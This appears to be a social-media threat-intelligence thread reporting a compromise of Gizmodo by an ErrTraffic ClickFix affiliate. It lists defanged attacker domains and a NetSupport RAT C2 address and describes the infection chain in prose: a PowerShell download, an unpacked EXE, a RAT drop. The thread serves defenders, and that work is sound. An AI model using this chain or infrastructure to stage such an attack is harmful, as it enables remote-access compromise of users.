RE: https://infosec.exchange/@briankrebs/116780029181293028

Heads up, Gizmodo has been compromised by some #ErrTraffic affiliate to. Inject is in main response.
ErrTraffic C2 cdnpro-987[.]xyz (Resoved via #EtherHiding)
PS Payload domain cdnportal-us[.]xyz (dynamic PowerShell command URI path)
PowerShell downloads a 16MB encrypted 7z file, checks if 7z is installed and otherwise downloads it to unpack the file and run the contained EXE. The EXE will do some profiling (including refresh rate) and if passes, will drop #NetSupportRAT and run it.
NetSupport C2 178[.]16[.]55[.]191.

TA also has a Mac payload configured, but it seems broken at the moment and ask for a password of some zip file when executed 🤷

Note: ErrTraffic is a ClickFIx-as-a-Service, so other compromised sites can lead to other malware from other affiliates.

We published an in-depth analysis on the #ErrTraffic framework, detailing two specific clusters ("Beer" and "Analytics"), campaigns compromising WordPress sites to deploy this malicious #ClickFix framework, as well as others impersonating AI platforms

Since that report was written, the operator "LenAI" has released ErrTraffic v4.

We shared some IoCs on our Community GitHub, and and I can share the latest ones, feel free to reach out!

https://github.com/SEKOIA-IO/Community/tree/main/IOCs/errtraffic

https://infosec.exchange/@sekoia_io/116758846525821124

#TDR analysts published a new report detailing #ErrTraffic, a widespread #ClickFix malware distribution framework.

ErrTraffic injects malicious JavaScript into compromised WordPress and malicious sites to serve ClickFix lures.

https://blog.sekoia.io/unveiling-errtraffic-inside-a-growing-clickfix-malware-distribution-framework/

Good article on ErrTraffic TDS with some hunting queries.

https://www.levelblue.com/blogs/spiderlabs-blog/err-hiding-and-seek-how-errtraffic-v3-leverages-etherhiding-in-clickfix-campaign

#errtraffic #tds #threathunting #clickfix